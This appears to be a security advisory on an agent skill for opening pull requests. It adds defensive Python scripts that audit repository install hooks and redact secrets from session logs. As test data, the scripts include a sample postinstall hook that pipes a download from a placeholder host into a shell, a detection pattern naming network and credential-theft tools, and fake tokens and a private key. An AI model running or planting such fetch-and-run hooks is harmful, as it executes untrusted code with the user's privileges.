Pull Request

Advisory. Audited by static analysis on Apr 30, 2026.

Overview

No suspicious patterns detected.

Findings (0)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

What this means

The agent may help prepare or open public pull requests, so mistakes could be visible to maintainers or the public.

Why it was flagged

The workflow can guide public contribution actions across repositories. This is the skill's stated purpose and is bounded by issue-policy checks, rate limits, scope limits, and human escalation.

Skill content

Before creating or suggesting a pull request to ANY repository.

Recommendation

Review the diff, branch target, and PR description before publishing, especially for repositories you do not maintain.

What this means

If the target repository is untrusted, its test, build, or install scripts run with the agent's own privileges and could read, modify, or exfiltrate anything in the local environment.

Why it was flagged

Running repository-defined tests, linting, or build commands can execute code from the target repository. This is disclosed and central to PR validation, but still deserves user awareness.

Skill content

**Tests pass** — Run project's test command (check package.json, Makefile, etc.)

Recommendation

Review scripts before running them, including install-time hooks that execute without any explicit test command, and use a clean workspace or sandbox for unfamiliar repositories; if checks cannot be run safely, say so in the PR description.
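One way to do that review mechanically before an agent types `npm test` in a checkout: enumerate every repository-defined command that `npm install` and `npm test` would execute, flag the ones that warrant a human look, and choose an install command that skips lifecycle hooks until they have been approved. This is an added example, not code from the ClawScan advisory or the Pull Request skill. The npm hook names follow npm's documented lifecycle; the `SUSPICIOUS` heuristic, the Makefile parsing, and the sample checkout it builds are this example's own assumptions and are incomplete by design.

```python
"""Enumerate what `npm install` / `npm test` would run in a checkout before
an agent runs them. Added example; hook list per npm docs, everything else
is this example's own heuristic (assumption, not a complete scanner)."""
import json
import os
import re
import tempfile

# Scripts npm runs on its own during `npm install` in a project root.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepublish", "prepare")
# Scripts `npm test` runs.
NPM_TEST_HOOKS = ("pretest", "test", "posttest")
# Makefile targets a PR-validation step is likely to invoke (assumption).
MAKE_TEST_TARGETS = ("test", "check")

# Deliberately broad: network fetches, shell-string evaluation, privilege
# changes and credential paths all deserve a human look (assumption).
SUSPICIOUS = re.compile(
    r"curl|wget|\bnc\b|bash\s+-c|sh\s+-c|base64\s+-d|\beval\b|\$\(|`|/dev/tcp"
    r"|sudo|chmod\s+\+x|\.ssh|\.npmrc|AWS_|GITHUB_TOKEN"
)


def npm_scripts(repo_dir):
    """Return {script_name: command} from package.json, or {} if absent."""
    path = os.path.join(repo_dir, "package.json")
    if not os.path.exists(path):
        return {}
    with open(path, encoding="utf-8") as f:
        scripts = json.load(f).get("scripts", {})
    return {k: v for k, v in scripts.items() if isinstance(v, str)}


def makefile_targets(repo_dir):
    """Return {target: [recipe lines]} for a top-level Makefile, if any."""
    path = os.path.join(repo_dir, "Makefile")
    if not os.path.exists(path):
        return {}
    targets, current = {}, None
    with open(path, encoding="utf-8") as f:
        for line in f:
            line = line.rstrip("\n")
            m = re.match(r"^([A-Za-z0-9_.-]+)\s*:(?!=)", line)  # skip VAR := x
            if m:
                current = m.group(1)
                targets[current] = []
            elif line.startswith("\t") and current:
                targets[current].append(line.strip())
            elif not line.strip():
                current = None
    return targets


def audit(repo_dir):
    """List every repo-defined command that the usual validation steps
    would execute, with a suspicious flag for manual review."""
    findings = []
    scripts = npm_scripts(repo_dir)
    for phase, hooks in (("npm install", NPM_INSTALL_HOOKS), ("npm test", NPM_TEST_HOOKS)):
        for name in hooks:
            if name in scripts:
                cmd = scripts[name]
                findings.append({"phase": phase, "name": name, "command": cmd,
                                 "suspicious": bool(SUSPICIOUS.search(cmd))})
    for target, recipe in makefile_targets(repo_dir).items():
        if target in MAKE_TEST_TARGETS:
            cmd = "; ".join(recipe)
            findings.append({"phase": "make " + target, "name": target, "command": cmd,
                             "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def install_command(findings):
    """Skip lifecycle hooks whenever the repo defines any; a human can
    re-run them after reading the audit output."""
    if any(f["phase"] == "npm install" for f in findings):
        return "npm ci --ignore-scripts"
    return "npm ci"


def build_sample_repo():
    """Constructed sample checkout for the demo (not a real project)."""
    repo = tempfile.mkdtemp(prefix="pr-audit-")
    pkg = {"name": "sample-app", "scripts": {
        "postinstall": "node scripts/setup.js && curl -s https://example.invalid/x | sh",
        "test": "jest --ci"}}
    with open(os.path.join(repo, "package.json"), "w", encoding="utf-8") as f:
        json.dump(pkg, f)
    with open(os.path.join(repo, "Makefile"), "w", encoding="utf-8") as f:
        f.write("lint:\n\tnpx eslint .\n\ntest:\n\tnpm test\n")
    return repo


if __name__ == "__main__":
    results = audit(build_sample_repo())
    for r in results:
        print(("REVIEW " if r["suspicious"] else "ok     ") + r["phase"] + ": " + r["command"])
    print("install with:", install_command(results))
```

Run it against the checkout the agent is about to validate; anything marked REVIEW, and any install hook at all, should be read by a person before the hooks are allowed to run. The sandboxing itself (a throwaway container or VM with no access to your credentials) is separate from this check and is still needed even when nothing is flagged, because the heuristic is a starting set of patterns, not a complete detector.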

What this means

Private prompt details or internal context could be exposed if copied into a public PR without review.

Why it was flagged

Prompt or session logs may contain private context. The instruction is optional and paired with a no-secrets rule, but users should sanitize anything shared in a PR.

Skill content

Include context — Prompts or session logs if available and helpful

Recommendation

Share only relevant, scrubbed AI context and never include secrets, credentials, private URLs, or sensitive project details.
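A practical version of that scrub step, as an added example that is not part of the ClawScan advisory or the skill: a small redactor that rewrites a session log before it is pasted into a PR, reporting how many hits each rule produced so a reviewer can tell whether anything sensitive was present. The token formats for GitHub and AWS are public, but the rule set as a whole, the `.internal`/`.corp` host convention, and the sample log are this example's own assumptions; treat it as a first pass that precedes, not replaces, a human read-through.

```python
"""Redact common secret shapes from an agent session log before sharing it
in a PR. Added example; rule set is a starting point (assumption), not a
complete secret scanner."""
import re

# (rule name, pattern, replacement). Order matters: env assignments are
# handled before bare-token rules so a value is counted once.
RULES = [
    ("private_key",
     re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----", re.S),
     "[REDACTED_PRIVATE_KEY]"),
    ("env_assignment",
     re.compile(r"\b([A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|PASSWD|API_KEY|ACCESS_KEY)[A-Z0-9_]*=)[^\s\"']+"),
     r"\1[REDACTED]"),
    ("github_token",  # classic and fine-grained PAT prefixes
     re.compile(r"\b(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9]{36}\b|\bgithub_pat_[A-Za-z0-9_]{22,}\b"),
     "[REDACTED_GITHUB_TOKEN]"),
    ("aws_access_key", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "[REDACTED_AWS_KEY]"),
    ("bearer", re.compile(r"(authorization:\s*bearer\s+)[^\s\"']+", re.I), r"\1[REDACTED]"),
    ("url_credentials", re.compile(r"(https?://)[^\s/@]+:[^\s/@]+@"), r"\1[REDACTED]@"),
    # Org-specific: hostnames under .internal / .corp are private (assumption).
    ("private_host",
     re.compile(r"\b[A-Za-z0-9.-]+\.(?:internal|corp)(?:\.[A-Za-z0-9-]+)+\b"),
     "[REDACTED_HOST]"),
]


def scrub(text):
    """Return (scrubbed_text, {rule_name: hit_count})."""
    counts = {}
    for name, pattern, repl in RULES:
        text, n = pattern.subn(repl, text)
        counts[name] = n
    return text, counts


def safe_to_share(counts, allow_redacted=True):
    """Policy hook: a log that needed redaction may still be shared once
    redacted, but a private key anywhere in it means start over."""
    if counts.get("private_key", 0):
        return False
    return allow_redacted or sum(counts.values()) == 0


# Constructed sample session log (fake credentials, invalid hosts).
SAMPLE_LOG = """\
user: run the tests using GITHUB_TOKEN=ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 and push
assistant: exporting AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
assistant: using token ghp_0123456789abcdefghijklmnopqrstuvwxyz for the API call
$ curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc" https://ci.corp.example/api
$ git remote add origin https://deploy:hunter2@git.internal.example/acme/app.git
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmU=
-----END OPENSSH PRIVATE KEY-----
assistant: tests passed (42 passed, 0 failed)
"""

if __name__ == "__main__":
    cleaned, hits = scrub(SAMPLE_LOG)
    print(cleaned)
    print("hits:", {k: v for k, v in hits.items() if v})
    print("safe to share after redaction:", safe_to_share(hits))
```

The per-rule counts are the useful output for a reviewer: a single `bearer` hit in a log that is otherwise clean is a different situation from a pasted private key, which `safe_to_share` treats as a reason to discard the log rather than share it redacted. Pattern-based redaction misses secrets that do not match a known shape (a plain password in free text, an internal ticket ID), which is why the advisory's recommendation still ends with a human deciding what is relevant to the PR.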